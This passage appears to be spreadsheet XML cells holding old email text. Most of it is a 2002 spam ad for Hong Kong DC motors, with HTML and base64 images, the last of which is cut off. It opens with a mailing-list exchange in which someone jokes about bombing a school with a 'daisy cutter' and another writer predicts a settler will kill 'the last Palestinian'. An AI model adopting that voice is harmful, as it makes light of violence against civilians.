 &gt;And of course for the Palestinians it wasn't a mistake, which is a key
 &gt;part of the horror.
 &gt;
 &gt;I'm not against American taxpayers remodeling a school honoring a killer
 &gt;if we do it with a daisy cutter.
 &gt;
 &gt;
 &gt;  
 &gt;
 I'm sure the plan is that it will be renamed for the settler who kills 
 the last Palestinian in a few years.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Avfs] D.C. MOTOR
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_001_0012_01C1D6EE.D7F988E0"
 ------=_NextPart_001_0012_01C1D6EE.D7F988E0
 Content-Type: text/plain;
 	charset="big5"
 Content-Transfer-Encoding: quoted-printable
 DC MOTOR,  GEAR MOTOR. New Offer 2002
               For customer's  O.E.M  are most welcomed=20
 If special requested RPM, length of shaft, torque, size, voltage, etc. =
 Please contact us=20
 E-mail:   motorvan@sinaman.com                Please contact with Mr. =
 Van Lee
       NO: HL101-D-D8xH6 VIBRATOR MOTOR  SIZE:  20 x 15.5 x H25 MM =20
       PRICE:  US$ 0.12/PC
      NO:HL307 DC MOTOR=20
       SIZE: D12 x 19.5 MM
                       PRICE: US$ 0.38/PC =20
       NO: HL1011-DC  MOTOR FOR WHEELCHAIR, SCOOTER=20
       SIZE: D100 x H70 MM
       OUTPUT: 95 W
                       PRICE: US$ 13.50/PC=20
      NO: HL200 GENERATOR MOTOR=20
       SIZE: D30.5 x H13 MM
       PRICE: US$ 2.3
     =20
       WE PRODUCE MORE THAN 70 DIFFERENT DESIGN AND=20
       SIZE OF  DC, GEAR AND AC MOTORS, THEY ARE SUITABLE =20
       FOR OPERATION TOYS, HOUSEHOLD APPLIANCES, RECORDS,=20
       SCOOTER, VIBRATOR, GENERATOR, WHEELCHAIR ETC.
       -----ANY ENQUIRY ARE WELCOME-----
       Hing Lung Motor Mfy,  Hong Kong    Tel : 852-24218309      =
 852-24259526      Fax: 852-24817148           =20
     =20
 ------=_NextPart_001_0012_01C1D6EE.D7F988E0
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dbig5"&gt;
 &lt;META content=3D"MSHTML 6.00.2600.0" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT size=3D2&gt;
 &lt;P&gt;&lt;B&gt;&lt;I&gt;&lt;FONT color=3D#ff0000 size=3D6&gt;DC MOTOR,&amp;nbsp; GEAR=20
 MOTOR.&amp;nbsp;&lt;/FONT&gt;&lt;FONT color=3D#0000ff size=3D6&gt;New =
 Offer&amp;nbsp;&lt;/FONT&gt;&lt;FONT=20
 color=3D#ff0000 size=3D6&gt;2002&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;&lt;/P&gt;&lt;FONT face=3D"Comic Sans =
 MS"=20
 color=3D#ff00ff=20
 size=3D5&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbs=
 p;&amp;nbsp;&amp;nbsp;=20
 For customer's&amp;nbsp; O.E.M&amp;nbsp; are most welcomed&lt;/FONT&gt; &lt;BR&gt;&lt;FONT=20
 face=3D"Comic Sans MS" color=3D#008000 size=3D3&gt;If special requested =
 RPM, length of=20
 shaft, torque, size, voltage, etc. Please contact us&lt;/FONT&gt; &lt;BR&gt;
 &lt;P&gt;&lt;FONT face=3D"Comic Sans MS" color=3D#ff0000 =
 size=3D3&gt;E-mail:&amp;nbsp;&amp;nbsp; &lt;A=20
 href=3D"mailto:motorvanli@yahoo.com.hk"&gt;motorvan@sinaman.com&lt;/A&gt;&lt;/FONT&gt;&amp;n=
 bsp;&amp;nbsp;=20
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; =
 &lt;I&gt;&lt;FONT color=3D#000000 size=3D5&gt;&lt;B&gt;Please contact with Mr. Van=20
 Lee&lt;/B&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;/P&gt;
 &lt;TABLE width=3D"100%" border=3D1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"50%"&gt;&lt;IMG height=3D49=20
       src=3D"cid:000c01c1d6ab$c9c58000$777ba8c0@AndrewLi" width=3D66 =
 align=3Dleft=20
       border=3D0&gt;&lt;I&gt;NO: HL101-D-D8xH6 &lt;FONT color=3D#ff0000&gt;VIBRATOR=20
       MOTOR&amp;nbsp;&lt;/FONT&gt; SIZE:&amp;nbsp; 20 x 15.5 x H25 MM&amp;nbsp; =
 &lt;BR&gt;PRICE:&amp;nbsp;=20
       US$ 0.12/PC&lt;/I&gt;&lt;BR&gt;&lt;/TD&gt;
     &lt;TD width=3D"50%"&gt;&lt;IMG height=3D37=20
       src=3D"cid:000d01c1d6ab$c9c58000$777ba8c0@AndrewLi" width=3D56 =
 align=3Dleft=20
       border=3D0&gt;&lt;I&gt;NO:HL307 &lt;FONT color=3D#ff0000&gt;DC MOTOR&lt;/FONT&gt; =
 &lt;BR&gt;SIZE: D12 x=20
       19.5=20
       =
 MM&lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp;=20
       &amp;nbsp;&amp;nbsp; PRICE: US$ 0.38/PC&lt;/I&gt; &lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"50%"&gt;&lt;IMG height=3D59=20
       src=3D"cid:000e01c1d6ab$c9c58000$777ba8c0@AndrewLi" width=3D64 =
 align=3Dleft=20
       border=3D0&gt;&lt;I&gt;NO: HL1011-&lt;FONT color=3D#ff0000&gt;DC&amp;nbsp; MOTOR =
 FOR&lt;/FONT&gt; &lt;FONT=20
       color=3D#ff0000&gt;WHEELCHAIR, SCOOTER&lt;/FONT&gt; &lt;BR&gt;SIZE: D100 x H70=20
       MM&lt;BR&gt;OUTPUT: 95=20
       =
 W&lt;BR&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;n=
 bsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
       PRICE: US$ 13.50/PC&lt;/I&gt; &lt;BR&gt;&lt;/TD&gt;
     &lt;TD width=3D"50%"&gt;&lt;IMG height=3D52=20
       src=3D"cid:000f01c1d6ab$c9c58000$777ba8c0@AndrewLi" width=3D64 =
 align=3Dleft=20
       border=3D0&gt;&lt;I&gt;NO: HL200 &lt;FONT color=3D#ff0000&gt;GENERATOR =
 MOTOR&lt;/FONT&gt; &lt;BR&gt;SIZE:=20
       D30.5 x H13 MM&lt;BR&gt;PRICE: US$ 2.3&lt;BR&gt;&lt;/I&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE width=3D"100%" border=3D1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;&lt;IMG height=3D131=20
       src=3D"cid:001001c1d6ab$c9c58000$777ba8c0@AndrewLi" width=3D104 =
 align=3Dleft=20
       border=3D0&gt;&lt;FONT color=3D#0000ff&gt;&lt;FONT size=3D4&gt;&lt;I&gt;&lt;B&gt;WE PRODUCE =
 MORE THAN 70=20
       DIFFERENT DESIGN&amp;nbsp;&lt;/B&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;B&gt;&lt;I&gt;&lt;FONT =
 size=3D4&gt;AND&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;=20
       &lt;/FONT&gt;
       &lt;P&gt;&lt;FONT color=3D#0000ff&gt;&lt;B&gt;&lt;I&gt;&lt;FONT size=3D4&gt;SIZE OF&amp;nbsp; DC, =
 GEAR AND AC=20
       MOTORS,&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt; &lt;B&gt;&lt;I&gt;&lt;FONT size=3D4&gt;THEY ARE=20
       SUITABLE&amp;nbsp;&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt; &lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT size=3D4&gt;&lt;I&gt;&lt;B&gt;&lt;FONT color=3D#0000ff&gt;FOR OPERATION=20
       TOYS,&lt;/FONT&gt;&lt;/B&gt;&lt;/I&gt;&lt;/FONT&gt; &lt;FONT color=3D#0000ff&gt;&lt;FONT=20
       size=3D4&gt;&lt;I&gt;&lt;B&gt;HOUSEHOLD =
 APPLIANCES,&amp;nbsp;&lt;/B&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;B&gt;&lt;I&gt;&lt;FONT=20
       size=3D4&gt;RECORDS,&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt; &lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT color=3D#0000ff&gt;&lt;B&gt;&lt;I&gt;&lt;FONT =
 size=3D4&gt;SCOOTER,&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;=20
       &lt;B&gt;&lt;I&gt;&lt;FONT size=3D4&gt;VIBRATOR, GENERATOR, WHEELCHAIR=20
       ETC.&lt;/FONT&gt;&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;I&gt;&lt;B&gt;&lt;FONT size=3D4&gt;-----&lt;/FONT&gt;&lt;FONT color=3D#00ff00 =
 size=3D5&gt;ANY ENQUIRY=20
       ARE WELCOME&lt;/FONT&gt;&lt;FONT color=3D#000000 =
 size=3D4&gt;-----&lt;/FONT&gt;&lt;/B&gt;&lt;/I&gt;&lt;/P&gt;
       &lt;P&gt;&lt;I&gt;&lt;B&gt;&lt;FONT size=3D3&gt;&lt;FONT color=3D#ff0000&gt;Hing Lung Motor=20
       Mfy,&amp;nbsp;&amp;nbsp;&lt;U&gt;Hong Kong&lt;/U&gt;&amp;nbsp;&lt;/FONT&gt;&lt;FONT color=3D#ff0000 =
       size=3D4&gt;&amp;nbsp; &lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT color=3D#000000=20
       size=3D4&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/B&gt;&lt;/I&gt;&lt;FONT color=3D#0000ff&gt;&lt;I&gt;Tel :=20
       852-24218309&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
       852-24259526&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Fax:=20
       852-24817148&amp;nbsp;&amp;nbsp;&lt;/I&gt;&lt;/FONT&gt;&lt;I&gt;&lt;B&gt;&lt;FONT color=3D#000000=20
       size=3D4&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/FONT&gt;&lt;FONT=20
       color=3D#000000&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
 &lt;/FONT&gt;&lt;/B&gt;&lt;/I&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_001_0012_01C1D6EE.D7F988E0--
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0
 Content-Type: image/jpeg;
 	name="101c.JPG"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;000c01c1d6ab$c9c58000$777ba8c0@AndrewLi&gt;
 /9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a
 HBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
 MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wgARCAAxAEIDASIA
 AhEBAxEB/8QAGgABAAIDAQAAAAAAAAAAAAAAAAQFAQIDBv/EABcBAQEBAQAAAAAAAAAAAAAAAAEC
 AwD/2gAMAwEAAhADEAAAAfY64haTPzQdM25zRzEnCjI5j09tSY3XS0fFtY1T0e9dwo5+hejWOXm/
 U6zXlOvoeENMnyRq50jayQw1ncTOuo1jJKFgd3//xAAhEAACAwACAgIDAAAAAAAAAAABAgADBBIT
 ESAQMRQiMP/aAAgBAQABBQL+P0HecyT3OIuu2Jp8+ls029da6XEXWIttVptcVXWcjUh0B5cPK2Ak
 nLWYcYjZrFiI1dr9nXiexnloJRjerfksIuquP13LxLPb4mT9V+Siw56mhw0yulao1QconH0P37f/
 xAAbEQACAwADAAAAAAAAAAAAAAAAEQEQIQIgQf/aAAgBAwEBPwFOlN8TBCyokwZ53//EAB0RAAID
 AAIDAAAAAAAAAAAAAAABAhESAxATICH/2gAIAQIBAT8BlKjyG11ZyCTLNNyrqUdGGKDsr77/AP/E
 ACYQAAIBAwEIAwEAAAAAAAAAAAABEQIhMQMQEiAiMFFhcRMjgZH/2gAIAQEABj8C6Uklmc1Cfpl6
 WuBE+TMl6F+ETHsWlKfkXx1Q+4lXDp77UndGILMsyip7rfao01iFP9HvuUlssP6zm06kZI3jlwi8
 yPzwYL0oxBYnqf/EACMQAQACAgECBwEAAAAAAAAAAAEAESExEGFxIEFRgZGxwfD/2gAIAQEAAT8h
 jL4vwYlljG21Hyl6QE2QX8F8QTffZYlnKoEarsFRBdzeZ9mYS8HbpYZAJeeJQQTXRLTJsT3ZUuki
 xjOmfnTKmclQi+9QtUWuQjHRVfdLlcB34R+abah1n4sisNJmdc3iIVrhcmCtSpHNtzEuIMRs/HEJ
 bZ7WIdU3R9T1fDphqbPH/9oADAMBAAIAAwAAABBwa/IAh7o7KIKQrD5+B3//xAAcEQEBAQACAwEA
 AAAAAAAAAAABABEQQSAhMVH/2gAIAQMBAT8QMIH4X6XfBMlXDJNYgiItPSy68f/EABoRAAMAAwEA
 AAAAAAAAAAAAAAABERAhMUH/2gAIAQIBAT8QGim+jZA22R1MTekBMWaY4w6Qm3hMLC5j/8QAIxAB
 AAICAQMFAQEAAAAAAAAAAQARITFBUWGhEHGBkbHB8P/aAAgBAQABPxCJNoHvAOk+5c9s3GhglU+h
 YaglNWgYO0AWQcGqlyGi85iiZfCS+YWhr5F/UAsglidJct6xQVzazpRA8t3/ACIwBkURXtGo3DkX
 fxUEPeRE+avzBloQ1IoPfEoXobLEdPEvaRKFmF49pmBDNihOIIjo57JmBKuhH26NZcLDP8blcEIZ
 CqJbZakZ5L1reuIEWWC3lj8/ZZOPfRUdtqDyJYzJyNPEVAro4fMsilGStROI2YFQQZBSEBZa4pWK
 1+yurzFVzN5X1cbRP0hKOvtcvSXf/FSoLXfNzGW9coKwE4A9PCmj2nkejqMNev8A/9k=
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0
 Content-Type: image/jpeg;
 	name="307.jpg"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;000d01c1d6ab$c9c58000$777ba8c0@AndrewLi&gt;
 /9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a
 HBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
 MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wgARCAAlADgDASIA
 AhEBAxEB/8QAGgAAAgMBAQAAAAAAAAAAAAAAAAIEBQYBA//EABYBAQEBAAAAAAAAAAAAAAAAAAEA
 Av/aAAwDAQACEAMQAAAB1R6Z1zfvjpMagprSfUYaJmtNW4qRnjJOl1+imYKIihqAIboWugB//8QA
 IBAAAgIDAAEFAAAAAAAAAAAAAQMAAgQREiAQEyEiI//aAAgBAQABBQLUOhBYW8su/wCglXOrKZTY
 tgZWXvyHfdvMG57nC8XJqpYOwfmOw6MFsHJpCchcVcPChxTx16an/8QAFhEBAQEAAAAAAAAAAAAA
 AAAAASAQ/9oACAEDAQE/AaMY/8QAFhEBAQEAAAAAAAAAAAAAAAAAERAw/9oACAECAQE/AWmP/8QA
 IhAAAgIBBAEFAAAAAAAAAAAAAAECESEDEBIjcSAwMWFy/9oACAEBAAY/AjJhp+rjboxIxMzFMtb3
 vIqal5otGT5cWdeqpfo7NB+YnFRd/aFDj7P/xAAfEAADAQACAgMBAAAAAAAAAAAAAREhMXEQUSBB
 YaH/2gAIAQEAAT8hMdaL22fysZCEJ409bTGuXTOVX3o855qc6ig7uZ2ET7pd13EOiFXN0JVwPUIk
 mjAe0TNFD6Q5pLsHL3NMHtML95E8+EI8Kj//2gAMAwEAAgADAAAAEJDVc/8A6z9zwP8A/8QAGREA
 AwEBAQAAAAAAAAAAAAAAAAERITEQ/9oACAEDAQE/ENZEKcIjIRjZpvpcGz//xAAXEQEBAQEAAAAA
 AAAAAAAAAAABABEh/9oACAECAQE/EGaWWJHdtJHePLLDICyb/8QAIRABAAICAgIDAQEAAAAAAAAA
 AQARIUExURCRYXGBwdH/2gAIAQEAAT8QttqOnz5oECsD4mWYdvC9wA3AF0m7NL3y45iMk/ISoA6w
 f7QjsimIJrq6abPx8O0hIakVOKZzwr7ilFn3BIbEo5azj0TFcuzQFaP5HOsxOyPgA9xcaxEg/Yk9
 zEhNtPU05QdX7VQdwNLRFuCUqqMEQq3MSVHheYBwV47k/9k=
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0
 Content-Type: image/jpeg;
 	name="1011.jpg"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;000e01c1d6ab$c9c58000$777ba8c0@AndrewLi&gt;
 /9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a
 HBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
 MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wgARCAA7AEADASIA
 AhEBAxEB/8QAGwAAAgIDAQAAAAAAAAAAAAAABgcBAwACBQT/xAAXAQEBAQEAAAAAAAAAAAAAAAAB
 AAID/9oADAMBAAIQAxAAAAE/zAWOtwhGaYZKl7wc8BxkvlUTSXVmiKJjTa2QrZK5LlL14yuJaWs2
 6OL/AE86S3OBdkzdmZdOAHs+LKjIDya8nrzJ/8QAIhAAAgEEAwACAwAAAAAAAAAAAgMEAAEFERAS
 ExUjMDI0/9oACAEBAAEFAuJWZQi/z7dx84llAwG2rXGWyBXOtcLcxRQcofEhnlHPfdC7MNq/I61X
 YuuKkXfFyP8AEwavwI3K9x63rCfu0PRT0EF9VqlN8a6panVYdXVVZAPqMepcxEXkmpdlL4m40ZAy
 EPGhU07x8O1lIjrjh+H/xAAXEQADAQAAAAAAAAAAAAAAAAAAARAR/9oACAEDAQE/Abo6hqqYZP/E
 ABQRAQAAAAAAAAAAAAAAAAAAAED/2gAIAQIBAT8BB//EACsQAAEDAgUDAQkAAAAAAAAAAAIAAREQ
 EgMhMUFRBCBhMhMUIiMwQnKBsf/aAAgBAQAGPwKlo/MLwssEIUYo2KQJibx2e64L/k7dkgZC/hAP
 U6F6ToZ8Mnd9UITDlu6cNfNbZeGUF6gyR1zWTKKG2yIOWTy1X8osS+0m+2hHzS9gnmFHZ7Nh3zJM
 A6NWQgT/AKhYuntt3FtV8OEb/pTjPY3G6tw2j6X/xAAiEAEAAgEFAAMAAwAAAAAAAAABABExECFB
 UWEgcYGxwdH/2gAIAQEAAT8hmInvHJifscYdLYwMfeSe58V6IcmjRXWQvUpuq30LxPdYKosDx/6y
 5UOXT7huattZSm7fEEs7cNepU8MaC4I6gF73L2cQX+H8yybHaKtQo3gy9R7BTKje8IbGKoCUVMtB
 7NleJ/YLIbI6p1NKcB+6u5Zhs4fNK0Ddp0ECSgo0S5saOGtvtDlqK3J6lcQ8cqPJt4NlHLy/FxKP
 h//aAAwDAQACAAMAAAAQtkb58Mvv8prFsdmd/8QAGhEBAQEBAQEBAAAAAAAAAAAAAQAREEEhUf/a
 AAgBAwEBPxBt/bWAzRt94vt7FnDrvEsGDL//xAAYEQADAQEAAAAAAAAAAAAAAAABEBEAIP/aAAgB
 AgEBPxBVjFzDir//xAAlEAEAAgIBAgYDAQAAAAAAAAABABEhMUFRYRBxgaHB0SCRseH/2gAIAQEA
 AT8QigtaIWqqIBuj9Ljb2TZn94iArir/AKkOsOgj28NEPmeBmtPOrj8/qWZmVVL3u/KUFK74gYy5
 dvPrCjitMBRqgY3zAJYiRGhkDsx7xCEbXKrll3Pb+ldev1HZi4Gh1JTpKuAXgllpLVx6I5l1jfIf
 SIUazfypAN0XKEbMXuUCi3RDxTXxHu8TH0AmbEdIwWb68wedkvSxIWZYt0ePeM8tRxqolLerlJwp
 gud1wjsbhdPCvkdWUbP5DbrK01snv8eCq4qiLNdDmmrOkIYtstK0wiHZc1OIeerWar1/ko7MHy+A
 CmMjv0Kdj7Tcteu5JeYa6ZO+JlCs4k8+CDVXcTqvP474BoPw/9k=
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0
 Content-Type: image/jpeg;
 	name="gen.JPG"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;000f01c1d6ab$c9c58000$777ba8c0@AndrewLi&gt;
 /9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a
 HBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIy
 MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wgARCAA0AEADASIA
 AhEBAxEB/8QAGgAAAgMBAQAAAAAAAAAAAAAAAAUCAwQGAf/EABgBAAMBAQAAAAAAAAAAAAAAAAEC
 AwAE/9oADAMBAAIQAxAAAAHrgLyKMy6b793OVLurAovuPYiBqprnz0zL3yEhr1OJhZPVrLA2Uwzp
 +emtpnZHOLsGmyTgDiFITNtoNvQG3//EACAQAAMAAgICAwEAAAAAAAAAAAECAwAEEBIRExQgIiH/
 2gAIAQEAAQUC5aqrnysRg6/Stv4GD5Q/jS2/D82fKL3xnWa1bspHTNPap6lJK5enSnej4kAuFQ4d
 WtbW1U1042SuCox7pMPsvsHRKSRHDc2n7MrqP5+IWaUvxOPjFUjB55OGMyQij6f/xAAaEQACAgMA
 AAAAAAAAAAAAAAAAAQIQESBB/9oACAEDAQE/ARRGqjbEYpo5p//EAB0RAAIBBAMAAAAAAAAAAAAA
 AAABAgMQETESIUH/2gAIAQIBAT8BJVMaFN+2m+rYIpktHITE8iJISt//xAAlEAABAwIFBAMAAAAA
 AAAAAAABAAIREiAQISIxQQMyUYETQmH/2gAIAQEABj8Cs7VULctlknHgKl2xspUSoTWgad58lVLu
 n8QJEHAytDfZUu1HD4Onn5KA5xnnCXFUdDS37PWlvu3J5CNZcSqWjLDa2aVtZ//EACMQAQACAgIB
 AwUAAAAAAAAAAAEAESExEEFRIHHRYYGRobH/2gAIAQEAAT8h537b4I9tPeD9L6TEKhthF2qVXaHP
 xEbcfiDZZzTj92GRIB6lSuYDhVySzg1WYtWKOFuXEAyeOCzN34jg0EEr/d1GhPInj6+kMgPdmuAF
 jCJ1BtCIr+08SmNXfZgmGXwYxuIVzAaZ/UcNH+4B+JqKRdiLGATMtQXBMGAHXP8A/9oADAMBAAIA
 AwAAABD6C3ThfvDZqaBwDwH/xAAZEQEBAQEBAQAAAAAAAAAAAAABABEQITH/2gAIAQMBAT8QtfWH
 6cGsQSF8j7xmmQ7MFy15/8QAGxEAAwADAQEAAAAAAAAAAAAAAAEREDFBIVH/2gAIAQIBAT8QNAWT
 rDl4JXUPpiC9G+KNtDk6dWChU1j/xAAkEAEAAgEEAQUAAwAAAAAAAAABABEhMUFRYRBxgZGhwSDR
 8P/aAAgBAQABPxDzeiF21GEp66oqF/MPD/BQFcBOZfGo4uX1Srh6pB+rQO38YbNXggCQRLE8pZax
 f5SxFTKrhgRSgvTtYKSxDTVV1sGx7y5QrW+42jDXujsVmMqBVdSZPbwJ0JVSbImtbXBLStXg9o6c
 m3UTPUppB+v9zDokLTeP2fAEzocpBqt/Ur7nGId2xNJwOL+XqZuxpPkYNbPXaINWLRLZbDScQQrE
 YmtWuOSrCGFq1VuXmBileBF7b2RWx3FVNprjmg9MyBmqYv1hUAGkMoAcEfSvH//Z
 ------=_NextPart_000_0011_01C1D6EE.D7F988E0
 Content-Type: image/jpeg;
 	name="hing0-2-1.JPG"
 Content-Transfer-Encoding: base64
 Content-ID: &lt;001001c1d6ab$c9c58000$777ba8c0@AndrewLi&gt;
 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
